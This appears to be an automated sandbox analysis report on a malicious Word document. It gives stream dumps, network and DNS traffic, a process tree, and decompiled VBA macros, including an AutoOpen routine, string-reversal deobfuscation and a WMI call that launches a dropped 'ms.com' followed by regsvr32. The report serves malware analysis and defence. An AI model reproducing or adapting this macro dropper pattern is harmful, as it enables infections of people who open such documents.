Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 348 |
Entropy: | 1.78450864632 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08 |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 106 |
Entropy: | 1.35911194617 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 775 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 775 |
Entropy: | 6.59935768005 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . . |
Data Raw: | 01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 95 d8 b6 61 10 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 3, 2020 10:12:14.717160940 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.744054079 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:14.744210958 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.774555922 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:14.801323891 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259387970 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259423018 CET | 80 | 49711 | 104.28.6.227 | 192.168.2.3 |
Dec 3, 2020 10:12:15.259588957 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
Dec 3, 2020 10:12:19.342504025 CET | 49711 | 80 | 192.168.2.3 | 104.28.6.227 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 3, 2020 10:12:04.872263908 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:04.899449110 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:05.977966070 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:06.005306005 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:07.103354931 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:07.139152050 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:09.160564899 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:09.187803984 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:10.486977100 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:10.514538050 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:11.725595951 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:11.763911009 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:12.123970032 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:12.181309938 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:13.119251966 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:13.154472113 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:14.142292023 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:14.185724974 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:14.652942896 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:14.693248034 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:16.145160913 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:16.182802916 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:20.156338930 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:20.191992044 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:35.233314991 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:35.260240078 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:35.375446081 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:35.411010981 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:40.677835941 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:40.704961061 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:41.510663986 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:41.537661076 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:42.374233961 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:42.401274920 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:43.279664993 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:43.315388918 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:44.258956909 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:44.285885096 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:46.834990025 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:46.862232924 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:48.029016018 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:48.055943966 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:48.889570951 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:48.916682005 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:49.686250925 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:49.713371992 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:54.746095896 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:54.773276091 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:12:55.001687050 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:12:55.045443058 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:10.023046017 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:10.050081968 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:15.319488049 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:15.356364965 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:45.000901937 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:45.027858973 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Dec 3, 2020 10:13:46.729356050 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Dec 3, 2020 10:13:46.756539106 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Dec 3, 2020 10:12:14.652942896 CET | 192.168.2.3 | 8.8.8.8 | 0xb1c0 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 104.28.6.227 | A (IP address) | IN (0x0001) | ||
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 104.28.7.227 | A (IP address) | IN (0x0001) | ||
Dec 3, 2020 10:12:14.693248034 CET | 8.8.8.8 | 192.168.2.3 | 0xb1c0 | No error (0) | 172.67.164.220 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49711 | 104.28.6.227 | 80 | C:\Users\Public\ms.com |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Dec 3, 2020 10:12:14.774555922 CET | 222 | OUT | |
Dec 3, 2020 10:12:15.259387970 CET | 223 | IN | |
Dec 3, 2020 10:12:15.259423018 CET | 223 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 10:12:10 |
Start date: | 03/12/2020 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1270000 |
File size: | 1937688 bytes |
MD5 hash: | 0B9AB9B9C4DE429473D6450D4297A123 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 10:12:13 |
Start date: | 03/12/2020 |
Path: | C:\Users\Public\ms.com |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb30000 |
File size: | 13312 bytes |
MD5 hash: | 7083239CE743FDB68DFC933B7308E80A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | moderate |
General |
---|
Start time: | 10:12:15 |
Start date: | 03/12/2020 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
Module: a7A5m |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "a7A5m" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ | |
Part of subcall function aSGxU@a7A5m: Len | |
Part of subcall function aSGxU@a7A5m: Mid | |
a3IdJQ | |
create | SWbemObjectEx.create( |
Line | Instruction | Meta Information |
---|---|---|
42 | Sub awAlq() | |
47 | aYKyQ | executed |
52 | axIuO | |
65 | agPh8 = akSqK(aSGxU(a3IdJQ)) | a3IdJQ |
66 | CreateObject(agPh8).create (axSiN) | SWbemObjectEx.create( |
67 | End Sub |
APIs | Meta Information |
---|---|
Replace | Replace( |
a7odJ |
Strings | Decrypted Strings |
---|---|
"""" |
Line | Instruction | Meta Information |
---|---|---|
39 | Public Function akSqK(aPENSZ) | |
40 | akSqK = Replace(aPENSZ, a7odJ, "") | Replace( a7odJ executed |
41 | End Function |
APIs | Meta Information |
---|---|
Len | Len( |
Mid |
Line | Instruction | Meta Information |
---|---|---|
2 | Function aSGxU(aie8CL) | |
33 | For a6mGn = Len(aie8CL) To 1 Step - 1 | Len( |
34 | azUoN = Mid(aie8CL, a6mGn, 1) | Mid |
35 | adHaPl = adHaPl & azUoN | |
36 | Next | Len( |
37 | aSGxU = adHaPl | |
38 | End Function |
Module: aH8xms |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aH8xms" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function awAlq@a7A5m: a3IdJQ | |
Part of subcall function awAlq@a7A5m: create |
Line | Instruction | Meta Information |
---|---|---|
2 | Sub AutoOpen() | |
3 | awAlq | executed |
4 | End Sub |
Module: aIsb7 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aIsb7" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
2 | Function aCqnt(ayM1o) | |
6 | aCqnt = akSqK(ayM1o) | executed |
7 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
8 | Function aMslO(aucpr) | |
13 | aMslO = (akSqK(aucpr)) | executed |
14 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function akSqK@a7A5m: Replace | |
Part of subcall function akSqK@a7A5m: a7odJ |
Line | Instruction | Meta Information |
---|---|---|
15 | Function ayUxA2(aT2PX) | |
20 | ayUxA2 = (akSqK(aT2PX)) | executed |
21 | End Function |
APIs | Meta Information |
---|---|
Part of subcall function amZcqK@abh0Rg: FileCopy |
Line | Instruction | Meta Information |
---|---|---|
27 | Sub aVzRp() | |
28 | acIr6u = aCqnt(adkJvD(0)) | executed |
29 | adeKx = aMslO(adkJvD(1)) | |
30 | amZcqK acIr6u, adeKx | |
31 | End Sub |
APIs | Meta Information |
---|---|
Chr |
Line | Instruction | Meta Information |
---|---|---|
62 | Function a9vceZ(a48o6) | |
63 | a9vceZ = Chr(a48o6) | Chr executed |
64 | End Function |
Line | Instruction | Meta Information |
---|---|---|
35 | Function a3eJx(aFP9Ao) | |
36 | If aFP9Ao = 0 Then | executed |
37 | a3eJx = - 6824 + 6825 | |
53 | Elseif aFP9Ao = 5 Then | |
54 | a3eJx = - 63 + 160 | |
55 | Else | |
56 | a3eJx = 1049 - 25 | |
57 | Endif | |
58 | End Function |
Line | Instruction | Meta Information |
---|---|---|
22 | Function axSiN() | |
23 | adeKx = aMslO(adkJvD(1)) | executed |
24 | aaqRT = ayUxA2(adkJvD(2)) | |
25 | axSiN = adeKx & " " & aaqRT | |
26 | End Function |
Line | Instruction | Meta Information |
---|---|---|
32 | Function a3ox6(a48o6) | |
33 | a3ox6 = a48o6 + - 158 + 184 | executed |
34 | End Function |
Line | Instruction | Meta Information |
---|---|---|
59 | Function aYzBn(a48o6, a20NB) | |
60 | aYzBn = a48o6 - a20NB | executed |
61 | End Function |
Module: aOMv0 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "aOMv0" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Len | Len( |